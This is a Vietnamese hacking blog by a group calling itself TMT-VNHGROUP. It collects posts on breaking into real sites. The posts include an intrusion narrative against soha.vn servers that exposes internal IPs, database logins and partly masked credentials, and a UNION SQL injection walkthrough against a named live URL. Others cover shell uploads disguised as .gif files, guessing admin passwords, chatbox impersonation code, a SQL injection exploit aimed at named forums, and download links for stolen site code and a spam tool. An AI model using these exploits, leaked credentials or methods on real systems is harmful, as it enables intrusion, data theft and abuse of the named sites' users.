Blog - Hacking

_How to check ipro.soha.vn


_Lâu lâu ko viết tut , vào làm cái gọi là tut chơi hehe ,bữa có nhặt đc con shell trên forum soha ,phân tích server thì khá khó LOCAL ,getroot thì ko có kerl
Uname -a: Linux web_forum_6156 [COLOR="Red"]2.6.18-308.[/COLOR]24.1.el5xen #1 SMP Tue Dec 4 18:33:26 EST 2012 x86_64

_Đối với mình có shell trên site lớn có rất nhiều tác dụng , để chức thực điều đó view file config lên thấy 1 đống này

$config['MasterServer']['servername'] = '192.168.3.72';
$config['MasterServer']['port'] = 3306;
//$config['MasterServer']['username'] = 'forumxxha';
//$config['MasterServer']['password'] = 'jZxxxxA';

Đôi chút về soha

+ Đã xem qua server gồm có những hệ thống sau- [url]http://phim.soha.vn/[/url]-http://video.soha.vn/-http://sohagame.vn/-http://musik.soha.vn/+Hệ thống quản lý server+Riêng forum sài cùng hệ thống ads với vtc- Sài hệ thống quản lý Ganglia XML Grid monitor-Quản lý dữ liệu bởi máy 192.168.3.72-Dịch vụ Web-Based Enterprise Management CIM-Chạy ssh server
_Nhìn cái ip 192 cũng biết đó là ip local của máy , chắc chắn sẽ remote được vào data của nó,vậy ta connect vào xem có cái đéo gì ko,thường thí mấy ku có shell rồi thì khỏi cần vào data làm gì , điều đó vẫn là sai lầm :d


_trên cái ảnh kia cho thấy có rất nhiều data chứa ở máy đó  suy ra 1 điều đây có lẽ là máy chứa data dự phòng chăn ???

_tiếp tục với suy luận  , nhìn thấy cái data ipro_5 chả biết nó là data gì thử goole gõ những từ khóa liên quan xem  : ipro soha

kek đúng như dự đoán có site ipro.soha.vn , nhưng liệu data của nó có nằm trong đây ??? thử mò vào table user của nó xem

hú hú đúng là data nó sài rầu vui sướng , tiếp tục thử update pass và đăng nhập , nhưng pass admin vẫn ko đúng :-ss

_Đến đây nản , chả lẽ bỏ đó , nhưng ko xem lại config của thằng forum soha tiếp tục phân tích , trong đó nó connect đến 1 đống ip khác nhau

+Máy 192.168.3.72 dùng để chứa data forum và mấy cái test ko quan trọng
+Máy 192.168.6.220 dùng để chứa data của http://sohagame.vn/
+Máy 192.168.9.109 là laveserver đéo biết nó chứa cái lồn gì

_Để ý máy 220 ta thử connect vào data nó xem  thì lại đc đống này

_nhưng vẫn ko có data của ipro , mẹ kiếp chả lẽ bỏ :-ss , châm điếu thuốc suy nghĩ 1 lúc thì , sao ko crack pass nhở :-?? , tiếp tục  quay lại với thằng 72 , view lại pass thì nó là MD5 , có thể crack hehe , vất cái pass thằng admin lên google thì ra đc pass , giờ login vào ipro.soha.vn thì .........phép mầu hiện ra

_Xem lại mã nguồn của nó thì nó sài drupal , có rất nhiều cách up shell và nếu nó change link thì vào http://ipro.soha.vn/robots.txt sẽ ra link admin

_Cuối cùng up đc shell , và view file config của nó thì lại được đống này

SMTP Server:192.168.4.21
Email :no-reply@i-pro.vnx
cMfpWWvnSD7
I-pro 5494af1f14axx939968c iceinflame@gmail.com
## Access control
$compress_options['username'] = "98babe4aexxxxac1d5c452d1ac";
$compress_options['password'] = "1b6740bexxxx32b598acbccd46d83";
## Path info
_và log hệ thống bà con có thể xem ở [url]http://mrtrung.net/secure.txt[/url]

'/vcdata/iprodev'
Jul 5 10:26:56 localhost sshd[3373]: Accepted password for manhnd from 192.168.1.63 port 1677 ssh2
Jul 5 10:26:56 localhost sshd[3373]: pam_unix(sshd:session): session opened for user manhnd by (uid=0)
Jul 5 10:26:58 localhost sudo: manhnd : TTY=pts/0 ; PWD=/home/manhnd ; USER=root ; COMMAND=/bin/bash
Jul 5 03:31:01 localhost proftpd[3344]: localhost.localdomain (::ffff:116.98.1.164[::ffff:116.98.1.164]) - FTP no transfer timeout, disconnected
Jul 5 03:31:01 localhost proftpd: Deprecated pam_stack module called from service "proftpd"
Jul 5 03:31:01 localhost proftpd: pam_env(proftpd:setcred): Unable to open config file: /etc/security/pam_env.conf: No such file or directory
Jul 5 03:31:01 localhost proftpd: Deprecated pam_stack module called from service "proftpd"
Jul 5 03:31:01 localhost proftpd: pam_succeed_if(proftpd:session): error retrieving information about user 0
Jul 5 03:31:01 localhost proftpd: pam_unix(proftpd:session): session closed for user iprodev
Jul 5 03:31:01 localhost proftpd[3344]: localhost.localdomain


_Phân tích cái đống log trên thì ta thấy có 1 thằng manhnd log vào hệ thống thường xuyên
_Tiếp tục view config thì ta đc cái đống bở này nữa

#$db_url = 'mysql://iprxxxst.VC@192.168.3.72/ipro_5';
$db_url = 'mysql://iproxxxxxest.VC@192.168.9.109/ipro_5';
//$db_url = 'mysql://iprotxxastest.VC@192.168.2.130/ipro_5';

_He he nhìn cái ip config của nó ta lại ra được 1 đống béo bở nữa......tiếp tục phân tích tiếp
_Ta có thêm máy 109 ở phía trên lúc trước ko biết nó là cái gì , nhưng connect vào thì đã biết nó là cái gì rầu , ko nói đâu :-"

ache_inc' => './sites/all/modules/memcache/memcache.inc',
'memcache_servers' => array('192.168.2.147:20291' => 'default'/*,
'192.168.2.200:20291' => 'locale',
/*'localhost:11212' => 'default',
'123.45.67.890:11211' => 'default',
'123.45.67.891:11211' => 'cluster2',
'123.45.67.892:11211' => 'cluster2'*/),
'web_servers' => array( '192.168.4.124',
'192.168.3.108'),
'root_path' => '/var/www/html/files/cached/',

_Máy 192.168.2.147 <-- chạy memcache_servers keke cái này có thể làm nghẽn server đây ;))


sites/all/modules/memcache/
_Bên nề

 Ở máy 192.168.2.199:3307 chứ data SERVER GAME Hỗn thế
+User :honthe
+Data :honthe
+pass:honthe
-Ở máy 192.168.6.220 để dữ liệu của cửu kiếm
+user :phuongnb
+data :cuukiem
máy 199 chứa gì đéo biết
máy 203 chứa file dữ liệu
máy 195 chứ dữ liệu thất kiếm
máy 221 dữ liệu thất kiếm web
máy 111 chứa data dữ liệu

+có thể lấy đc gift code của nó ^^ hehe , đã tạo thử game và chơi thành công
nằm ở dv_cck
status_code : sửa 11 , mỗi lần chỉ đc add 1 lần

Thông tin server 222.255.27.164
tình trạng là ko thể local với path /var/www/html/ chmod khá kỹ


mỗi 1 website sẽ đc đặt ở /home/ nhưng khi vào chỉ có riêng gamesoha.vn và những thằng nào nữa đéo biết

Safe_mod: OFF - PHP version: 5.2.17 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : NONE
Uname -a: Linux ipro_web_6137 2.6.18-194.el5xen #1 SMP Fri Apr 2 15:34:40 EDT 2010 x86_64
Server: - id: 48(apache) - uid=48 (apache) gid=0(apache


Đây là 1 bài về tư duy phân tích , hi vọng sẽ giúp ích cho mọi người về vấn đề trong HACKING....
TMT-VNHGROUP

Xem Thêm

 

Share code waphack.us / truyenso1.mobi

truyenso1.mobi
code : http://www.mediafire.com/?9luwvydqqs04uv3
data :http://www.mediafire.com/?g4apxl6qrci2tg5

waphack.us
code : http://www.mediafire.com/?kozd8b9hfqthh9y
data : http://www.mediafire.com/?7mzx54aq0ep2wis

Pass: vnhfamily.net or tmt_vnhgroup

Xem Thêm

 

share code wapgamevn.com, taigamemienphi.info, vinavip.mobi

:)) củ chuối :))
Bán 100K này =))
http://daivietpda.com/showthread.php/131364-Ban-toan-bo-code-va-data-taigamemienphi-info-vinavip-mobi-wapgamevn-com
demo :
http://vietnam3g.com/code/3/wapgamevn.com/
http://vietnam3g.com/code/2/vinavip.mobi/

wapgamevn.com
http://www.mediafire.com/?pf9ow3sgqqeqv2p
http://www.mediafire.com/?4i9w246isiohr56

taigamemienphi.info

http://www.mediafire.com/?e55neuwn90ds22d
http://www.mediafire.com/?ahbboztvazbgpm8
http://www.mediafire.com/?bno8ygotki65tn1


vinavip.mobi
http://www.mediafire.com/?f4zmv6doka4j007
http://www.mediafire.com/?2afkafzppv4j456

pass: vnhgroup

Xem Thêm

 

Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL

I. Hướng dẫn cơ bản khai thác SQL Injection đối với MySQL
Demo: Khai thác SQL Injection trong Basic PHP Events Lister 1.0

Đầu tiên với URL: http://seamoun.com/phpevents/event.php?id=1
Thực hiện thêm dấu ' sau id=1. URL trở thành http://seamoun.com/phpevents/event.php?id=1'
Ta phát hiện rằng phpvents có lỗi SQL Injection với thông báo sau:


Code:

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in C:\xampp\htdocs\phpevents\event.php on line 37


Đối tượng khai thác SQL Injection ở đây là "Basic PHP Events Lister 1.0". Giả sử chúng ta không biết trường và bảng của ứng dụng web này là gì?
Với lỗi SQL Injection gây ra bởi URL trên ta xem thử truy vấn (SQL) của nó liệu có bao nhiều trường. Sở dĩ cần xác định điều này
bởi vì khi chúng ta dùng UNION trong câu lệnh SQL thì số lượng trường của hai câu lệnh select phải trùng nhau.
(Các bạn không rõ vấn đề này thì xem ý nghĩa câu lệnh SQL. Ở đây mình không giải thích vì hiển nhiên phải hiểu rõ SQL mới khai thá được).
Xác định có bao nhiêu trường truy vấn với URL http://seamoun.com/phpevents/event.php?id=1 có rất nhiều cách để thực hiện. Ở đây mình sử dụng order by <num>. Thực hiện tăng dần <num>. Khi thực hiện order by <num>, nếu trang web không hiển thị lỗi tức là số lượng trường vẫn còn, thực hiện tăng <num> cho đến khi nào xuất hiện lỗi tức là ta đã thực hiện tìm đủ số lượng trường.

Lần lượt mình thử:

Code:

http://seamoun.com/phpevents/event.php?id=1 order by 1
http://seamoun.com/phpevents/event.php?id=1 order by 2
http://seamoun.com/phpevents/event.php?id=1 order by 3
...

http://seamoun.com/phpevents/event.php?id=1 order by 15 (<-- Vẫn OK)
http://seamoun.com/phpevents/event.php?id=1 order by 16 (Xuất hiện lỗi)


Như vậy truy vấn SQL với URL trên là 15 trường (field)
Đến đây có thể điều tra phiên bản SQL, user với lệnh sau

Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,@@version,1,1,1,1,1,1,1,1,1,1,1,1,1

http://seamoun.com/phpevents/event.php?id=1 union all select 1,user(),1,1,1,1,1,1,1,1,1,1,1,1,1



Sau khi đã có số lượng trường rồi thì lúc này sẽ tiến hành đoán bảng (table) login của nó: có thể thử với các table thông dụng như
manager, admin, administrator, systemlogin, ... (Việc đoán table thuộc về kinh nghiệm, kết hợp với việc crawl, spider nội dung web mà mình khai thác). Nếu như tên bảng không đúng thì khi thực hiện union all select ... nó sẽ thông báo lỗi, ngược lại nếu tên đúng thì nó chạy OK. Tiến hành thử tìm table như sau:


Code:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from systemlogin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from manager (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)


Sau khi đoán được tên table là admin. Tiếp theo là dự đoán tên trường trong bảng admin mà mình đã lấy được.
Có thể đoán tên trường trong bảng admin như là username,uname,user, ... pass, passwd, password, pword, .... (Tương tự như trên cũng tùy thuộc vào kinh nghiệm kết hợp với việc crawl, spider nội dung web để tìm tên trường). Tiền hành thử như sau


Code:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,username,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,user,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,uname,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)

Như vậy trường thứ nhất ta đoán được là uname trong bảng admin. Thực hiện đoán trường mật khẩu

http://seamoun.com/phpevents/event.php?id=1 union all select 1,password,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,passwd,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (Fail)
http://seamoun.com/phpevents/event.php?id=1 union all select 1,pword,1,1,1,1,1,1,1,1,1,1,1,1,1 from admin (OK)


Như vậy ta đoán được trường mật khẩu là pword. Như vậy ta đã có thông tin đầy đủ để lấy user và pass trong bảng admin với
2 trường uname và pword + tên bảng là admin
Thực hiện lệnh:


Code:
http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin.


Thực chất với hai câu lệnh trên thì ta tìm được user và pass nhưng muốn thực hiện lệnh http://seamoun.com/phpevents/event.php?id=1 union all select 1,concat(uname,0x3a,pword),1,1,1,1,1,1,1,1,1,1,1,1,1 from admin. Để có được tất cả user và pass trong bảng admin. Nếu trường hợp này xuất hiện lỗi ta có thể thêm limit 0,1 và tăng dần limit 1,1 limit 2,1 để lấy hết tất cả user và pass

Sở dĩ thực hiện câu lệnh trên để đồng thời lấy uname và pword không cần phải thực hiện 2 lần mới có được uname và pword.
0x3a---> dấu ":". Concat sẽ thực hiện cộng chuỗi

Đến đây ta đã có thông tin uname và pword.
Nếu trường hợp mà kết nối đến MySQL sử dụng user root thì việc tìm bảng và trường dễ dàng hơn với lệnh sau


Code:

Điều tra thông tin bảng:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,table_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.tables

Điều tra thông tin trường:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,column_name,1,1,1,1,1,1,1,1,1,1,1,1 from information_schema.columns


Ngoài ra trong một số trường hợp xuất hiện lỗi khi thực hiện khai thác có thể sử dụng hàm convert, hex, ... để không bị lỗi khi khai thác như:

http://seamoun.com/phpevents/event.php?id=1 union all select 1,1,unhex(hex(uname)),1,1,1,1,1,1,1,1,1,1,1,1 from admin

Xem Thêm

 

_SQL Tổng Quan (Mệnh đề WHERE)

Mệnh đề WHERE được dùng để thiết lập điều kiện truy xuất.

Mệnh đề WHERE

Để truy xuất dữ liệu trong bảng theo các điều kiện nào đó, một mệnh đề WHERE có thể được thêm vào câu lệnh SELECT.

Cú pháp

Cú pháp mệnh đề WHERE trong câu lệnh SELECT như sau:

SELECT tên_cột FROM tên_bảng
WHERE tên_cột phép_toán giá_trị


Trong mệnh đề WHERE, các phép toán được sử dụng là

Phép toán ---- Mô tả
= ------ So sánh bằng
<> ------ So sánh không bằng
> ------ Lớn hơn
< ------ Nhỏ hơn
>= ------ Lớn hơn hoặc bằng
<= ------ Nhỏ hơn hoặc bằng
BETWEEN ------ Nằm giữa một khoảng
LIKE ------ So sánh mẫu chuỗi

Lưu ý: Trong một số phiên bản của SQL, phép toán <> có thể được viết dưới dạng !=

Sử dụng mệnh đề WHERE

Để lấy danh sách những người sống ở thành phố Sandnes, ta sử dụng mệnh đề WHERE trong câu lệnh SELECT như sau:

SELECT * FROM Persons
WHERE City = 'Sandnes'


Bảng Persons:



Kết quả trả về:



Sử dụng dấu nháy

Lưu ý rằng ở ví dụ trên ta đã sử dụng hai dấu nháy đơn (') bao quanh giá trị điều kiện 'Sandnes'.

SQL sử dụng dấu nháy đơn bao quanh các giá trị ở dạng chuỗi văn bản (text). Nhiều hệ CSDL còn cho phép sử dụng dấu nháy kép ("). Các giá trị ở dạng số không dùng dấu nháy để bao quanh.

Với dữ liệu dạng chuỗi văn bản:

Câu lệnh đúng:
SELECT * FROM Persons WHERE FirstName = 'Tove'

Câu lệnh sai:
SELECT * FROM Persons WHERE FirstName = Tove

Với dữ liệu dạng số:

Câu lệnh đúng:
SELECT * FROM Persons WHERE Year > 1965

Câu lệnh sai:
SELECT * FROM Persons WHERE Year > '1965'

Phép toán điều kiện LIKE

Phép toán LIKE được dùng để tìm kiếm một chuỗi mẫu văn bản trên một cột.

Cú pháp

Cú pháp của phép toán LIKE như sau:

SELECT tên_cột FROM tên_bảng
WHERE tên_cột LIKE mẫu


Một ký hiệu % có thể được sử dụng để định nghĩa các ký tự đại diện. % có thể được đặt trước và/hoặc sau mẫu.

Sử dụng LIKE

Câu lệnh SQL sau sẽ trả về danh sách những người có tên bắt đầu bằng chữ O:

SELECT * FROM Persons
WHERE FirstName LIKE 'O%'


Câu lệnh SQL sau sẽ trả về danh sách những người có tên kết thúc bằng chữ a:

SELECT * FROM Persons
WHERE FirstName LIKE '%a'


Câu lệnh SQL sau sẽ trả về danh sách những người có tên chứa chuỗi la:

SELECT * FROM Persons
WHERE FirstName LIKE '%la%'

Xem Thêm

 

_SQL tổng Quan

_Tiếp dạo này thích chia sẻ lên ngồi thích viết :))

_ 1 . nếu muốn khai thác được SQL sâu hơn thì trước tiên mấy bé phải biết sơ sơ về nó đã ,cứ ngồi mà xem rồi đánh lệnh lại thì chắc gì đã hiểu

Bài 1 - Giới thiệu về SQL

SQL là chuẩn ngôn ngữ ANSI để truy cập CSDL.

SQL là gì?

SQL là viết tắt của Structured Query Language - Ngôn ngữ truy vấn cấu trúc.
SQL cho phép bạn truy cập vào CSDL.
SQL là một chuẩn ngôn ngữ của ANSI.
SQL có thể thực thi các câu truy vấn trên CSDL.
SQL có thể lấy dữ liệu từ CSDL.
SQL có thể chèn dữ liệu mới vào CSDL.
SQL có thể xoá dữ liệu trong CSDL.
SQL có thể sửa đổi dữ liệu hiện có trong CSDL.
SQL dễ học :-)

SQL là một chuẩn

SQL là một chuẩn của ANSI (American National Standards Institute - Viện tiêu chuẩn quốc gia Hoa kỳ) về truy xuất các hệ thống CSDL. Các câu lệnh SQL được sử dụng để truy xuất và cập nhật dữ liệu trong một CSDL.

SQL hoạt động với hầu hết các chương trình CSDL như MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase v.v...

Lưu ý: Hầu hết các chương trình CSDL hỗ trợ SQL đều có phần mở rộng cho SQL chỉ hoạt động với chính chương trình đó.

Bảng CSDL

Một CSDL thường bao gồm một hoặc nhiều bảng (table). Mỗi bảng được xác định thông qua một tên (ví dụ Customers hoặc Orders). Bảng chứa các mẩu tin - dòng (record - row), là dữ liệu của bảng.

Dưới đây là một ví dụ về một bảng có tên là Persons (người):



Bảng ở trên bao gồm 3 mẩu tin (dòng), mỗi mẩu tin tương ứng với một người, và bốn cột (LastName, FirstName, Address và City).

Với SQL ta có thể truy vấn CSDL và nhận lấy kết quả trả về thông qua các câu truy vấn.

Một câu truy vấn như sau:

SELECT LastName FROM Persons

Sẽ trả về kết quả như sau:



Lưu ý: Một số hệ thống CSDL đòi hỏi câu lệnh SQL phải kết thúc bằng một dấu chấm phảy (;). Chúng ta sẽ không dùng dấu chấm phảy trong bài viết này.

SQL là ngôn ngữ thao tác dữ liệu (DML - Data Manipulation Language)


SQL là cú pháp để thực thi các câu truy vấn. SQL cũng bao gồm cú pháp để cập nhật - sửa đổi, chèn thêm và xoá các mẩu tin.

Sau đây là danh sách các lệnh và truy vấn dạng DML của SQL:

SELECT - lấy dữ liệu từ một bảng CSDL.
UPDATE - cập nhật/sửa đổi dữ liệu trong bảng.
DELETE - xoá dữ liệu trong bảng.
INSERT INTO - thêm dữ liệu mới vào bảng.

SQL là ngôn ngữ định nghĩa dữ liệu (DDL - Data Definition Language)

Phần DDL của SQL cho phép tạo ra hoặc xoá các bảng. Chúng ta cũng có thể định nghĩa các khoá (key), chỉ mục (index), chỉ định các liên kết giữa các bảng và thiết lập các quan hệ ràng buộc giữa các bảng trong CSDL.

Các lệnh DDL quan trọng nhất của SQL là:

CREATE TABLE - tạo ra một bảng mới.
ALTER TABLE - thay đổi cấu trúc của bảng.
DROP TABLE - xoá một bảng.
CREATE INDEX - tạo chỉ mục (khoá để tìm kiếm - search key).
DROP INDEX - xoá chỉ mục đã được tạo.

Xem Thêm

 

_SQl Tổng Quan 1 (Câu lệnh SELECT)

Câu lệnh SELECT được dùng để truy xuất dữ liệu từ một bảng. Kết quả trả về dưới dạng bảng được lưu trong 1 bảng, gọi là bảng kết quả - result table (còn được gọi là tập kết quả - result set).

Cú pháp

Cú pháp của câu lệnh SELECT như sau:

SELECT tên_các_cột
FROM tên_bảng

Truy xuất nhiều cột

Để truy xuất các cột mang tên LastNameFirstName, ta dùng một câu lệnh SELECT như sau:

SELECT LastName, FirstName FROM Persons

Bảng Persons:



Kết quả trả về:



Truy xuất tất cả các cột

Để truy xuất tất cả các cột từ bảng Persons, ta dùng ký hiệu * thay cho danh sách các cột:

SELECT * FROM Persons

Kết quả trả về:



Tập kết quả

Kết quả trả về từ một câu truy vấn SQL được lưu trong 1 tập kết quả (result set). Hầu hết các hệ thống chương trình CSDL cho phép duyệt qua tập kết quả bằng các hàm lập trình như Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...

Dấu chẩm phảy ( ; ) phía sau câu lệnh

Dấu chẩm phảy là một cách chuẩn để phân cách các câu lệnh SQL nếu như hệ thống CSDL cho phép nhiều câu lệnh SQL được thực thi thông qua một lời gọi duy nhất.

Các câu lệnh SQL trong bài viết này đều là các câu lệnh đơn (mỗi câu lệnh là một và chỉ một lệnh SQL). MS Access và MS SQL Server không đỏi hỏi phải có dấu chấm phảy ngay sau mỗi câu lệnh SQL, nhưng một số chương trình CSDL khác có thể bắt buộc bạn phải thêm dấu chấm phảy sau mỗi câu lệnh SQL (cho dù đó là câu lệnh đơn). Xin nhắc lại, trong bài viết này chúng ta sẽ không dùng dấu chấm phảy ở cuối câu lệnh SQL.

Xem Thêm

 

_Local Cơ Bản

_Tiếp ngày buồn , bài này chỉ hướng dẫn các NB về cách được gọi là mấy bác nói là "HACK" , ở đây mình chỉ nói đến mức cực cơ bản nhưng chủ yếu là tư duy của các bạn thôi ....

_ Vậy muốn hack thì làm gì ? Mục đích để làm gì ? , ở đây mục đích của mình là lấy CODE mang về chạy làm web thôi , hum bữa mình định làm cái web "Thuê Xe Du Lịch" ,chắc cũng chỉ biết lên google tìm từ khóa"Thuê Xe Du Lịch"
_Mình thấy site http://thuexedulich.com.vn/ khá là đẹp ;)) , Mục đích đã rõ giờ việc đầu tiên là xem nó làm bằng mã nguồn gì , xem đi xem lại đây là mã nguồn do CTY abc gì đó viết chả biết ;)) , tiếp theo là tìm xem server nó có nhiều web để khai thác lỗi không ( reverser ip)

_ Chúng ta có 41 websites trên 112.213.86.157 Server 112.213.86.157, Ngon  

Ngon thiệt ấy , Giờ check xem từng sirte 1 một , với tất cả các THỦ ĐOẠN ( Đoán pass,SQL injection.vvvv)
 _Mình check từ dưới Check lên , đoán bừa pass admin/12345 ai zè nó thế này đây @@
_Đúng là Việt Nam có khác :)) , giờ công việc tiếp theo là Upload Shell ,cách up shell thì khá nhiều ( thêm gif89 zô source ,change file.php.gif vvv...) , giờ tìm chỗ cho nó đục lỗ nào..."Sản Phẩm" <-- chỗ này cho phép upload ảnh đây , save con shell tmt.php.gif up thử xem thế nào

 _Giờ chạy link xem

_haha 1 con shell to đùng với đống info sau

Safe_mod: OFF - PHP version: 5.2.17 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source
Uname -a: Linux vps86157.vn 2.6.18-238.el5 #1 SMP Thu Jan 13 16:24:47 EST 2011 i686
Server: - id: 48(apache) - uid=48 (apache) gid=48(apache)
_ Việc tiếp theo là tìm PATH của nó "cat /etc/pass" sẽ ra 1 đống , Với quyền apache này thì cách local khá đơn giản với lại thằng chủ server cài đặt koloxo lên mức độ bảo mật kém

_Local id apache ở đây
 http://www.tmt-today.com/2011/08/local-id-apache.html

_Đến đây là quá đơn giản rồi ko cần phải viết tiếp nữa...chúc các NB lấy đc nhiều code ;)
_TUT By TMT-VNHgroup

Xem Thêm

 

__Nghịch ChangUonDyU Chatbox[ Dành cho Newbie] Phần 2

_Nghịch ChangUonDyU Chatbox[ Dành cho Newbie] Phần 1
 [+]_./http://www.tmt-today.com/2012/10/nghich-changuondyu-chatbox-danh-cho.html

_Nghịch ChangUonDyU Chatbox[ Dành cho Newbie] Phần 2


_ Bài này mình hướng dẫn bypass chbox với 2 giá trị là TRUE ( check key and domain)

$config['check_domain_reffer'] = true; //
$config['check_chatbox_key'] = true; //

Vẫn tiếp tục với code cũ  . view source lấy link chatbox

var chatboxkey = 'c75c1744f51255bcc02f82604f8f8447';
var huid = '222';
var hgroupid = '2';
var huser = "%3Cfont%20color%3D%22white%22%3E%3Cb%3EChymToNhatHo%3C%2Fb%3E%3C%2Ffont%3E";


giá trị khi config TRUE


Giờ ta sửa file host để khi $config['check_domain_reffer'] = true; //   <-- sẽ trả về giá trị đúng với khi admin config
Tạo folder @STH

các bạn đã thấy gì chưa :d , như vậy chỉ cần biết đúng key thì chúng ta sẽ chát mà ko cần login
vậy cách get key như thế nào zô VNH mà xem tut nhé các bạn trẻ ;)

And tut ...By TMT-Vnhgroup

Xem Thêm

 

Code Spam Mail



./_[+] http://www.mediafire.com/?vu9862id8r1r1pb

Xem Thêm

 

Nghịch ChangUonDyU Chatbox[ Dành cho Newbie]

_Lại chào bà con phát nữa,rảnh tiếp làm cái tut cho mấy ku nghịch ( chỉ dành cho mấy master gà ko config chatbox thôi nhá) pro lượn

[+] _Phần 1 ( config mặc định)

./_ Trước tiên lấy vic tim lên google tìm bừa được thằng Muonline  forum.mu4viet.com lấy nó test luôn zô reg cái nick thấy có chát box là thích rồi ;))
./_ http://forum.mu4viet.com/chatbox/ <- đây là chat box chưa được config và được đặt mặc định như sau

$config['check_domain_reffer'] = false; // <--- Không cho sử dụng domain #
$config['check_chatbox_key'] = false; // <-- Phải có key mới chát được trường hợp này là false với giá trị này thì ta vẫn có thể chát mà ko cần key ( mỗi 1 user có 1 key chát # nhau)

./_ Trong khi chát bật Http live lên để sniff

 

./_ Và ta có được đoạn code sau
 Referer: http://forum.mu4viet.com/chatbox//index.php
?do=postshout
&key=ace24b6eb5855aa4124e5fe85a2a750c
&userid=1
&groupid=6
&username=%3Cfont%20color%3D%27red%27%3E%3Cb%3ETMT%3C%2Fb%3E%3C%2Ffont%3E
&message=%2Fprune
&color=Lime
&font=Arial
&font=
&bold=B*
&italic=I
&underline=U
./_ Với config như trên thì ta không cần dùng đến key vẫn chát có thể chát được , bây giờ ta cài đặt Localhost để bắt đầu nghịch nhé , ở đây mình cài xampp

./_ Để bắt đàu công đoạn thì ta view cái source của diễn đàn lên sẽ thấy như sau
./_ Ở cái đống mã nguồn này ta lợi dụng đoạn JavaScript cõ sẵn , mình ko hướng dẫn chi tiết chỉ cần lấy 1 số đoạn mã cần thiết phục vụ cho việc mình cần làm thôi




<html>
<head>
<script language="JavaScript" type="text/javascript">
}

function fcb_setCookie(c_name,value)
{
var exdate=new Date();
exdate.setDate(exdate.getDate()+365);
document.cookie=c_name+ "=" +escape(value)+ ";expires="+exdate.toGMTString() + "path=/";
}
function fcb_getCookie(c_name)
{
if (document.cookie.length>0)
{
c_start=document.cookie.indexOf(c_name + "=");
if (c_start!=-1)
{
c_start=c_start + c_name.length+1;
c_end=document.cookie.indexOf(";",c_start);
if (c_end==-1) c_end=document.cookie.length;
return unescape(document.cookie.substring(c_start,c_end));
}
else { return ""; }
}

}
var path = 'http://forum.mu4viet.com/chatbox/'; 
var chatboxkey = 'ace24b6eb5855aa4124e5fe85a2a750c';
var huid = '1';
var hgroupid = '6';
var huser = "%3Cb%3E%3Cfont%20color%3Dred%3ETMT%3C%2Fb%3E%3C%2Ffont%3E";
function fcb_postshout()
{
        hmess = document.fcb_form.hmess.value;
        document.fcb_form.hmess.value = '';
        if (hmess == '')
        {
            alert('Chưa nhập nội dung!');
        }
        else
        {
            fcb_frame.location = path + '/index.php?do=postshout&key=' + chatboxkey + '&userid=' + huid + '&groupid=' + hgroupid + '&username=' + huser + '&message=' + encodeURIComponent(hmess) + '&color=Lime&font=Arial&font=&bold=B*&italic=I&underline=U';
        }
}
 /script>
</head>

<body bgcolor="#2c2c2c" text="#0F0">

<form name="fcb_form" method="post" action="javascript:fcb_postshout();">
<input id="hmess" type="text" name="hmess" style="width:94%;">
<input type="submit" value="Send">
</form>

<iframe name="fcb_frame" src="http://forum.mu4viet.com/chatbox/index.php" frameborder="0" style="width: 100%; height: 93%"></iframe>

</body>
</html>

./_ Save nó lại thành HTML và  gõ thôi :))  , change cái tên TMT thành tên Của bạn là ok
 ./_Bên ChátBox
./_Hết phần 1 với mức cơ bản ....Code juno_okyo chym teo

Xem Thêm

 

ChangUonDyU - Advanced Statistics SQL injection

_ Tình hình ku juno nó cũng pub BUG này lên rồi thôi thì chả giữ làm gì :)) pub lên cho mấy bạn được gọi là " Trẻ Trâu" Nghịch và phá and SHOW  ha ha
_Mình chỉ hướng dẫn qua loa thôi không hướng dẫn chi tiết, khai thác cách nào thì tùy mấy bé ;)

  010101010101010101010101010101010101010101010101010101010   
1 VNHGROUP 0
0 H4cking - S3cure - Und3rGroup 0
010101010101010101010101010101010101010101010101010101010
#####################################################################################################
->Vulnerability
#####################################################################################################

->http://target.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

#####################################################################################################

->eg: http://diendanhaiduong.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20
http://sinhvientayan.com/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,
user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

http://vietsource.net/forum/ajax.php?do=inforum&listforumid=52) UNION SELECT 1,2,3,4,5,6,concat_ws(0x7c,user(),version(),database()),8,9,10,11 from user where userid=1-- -&result=20

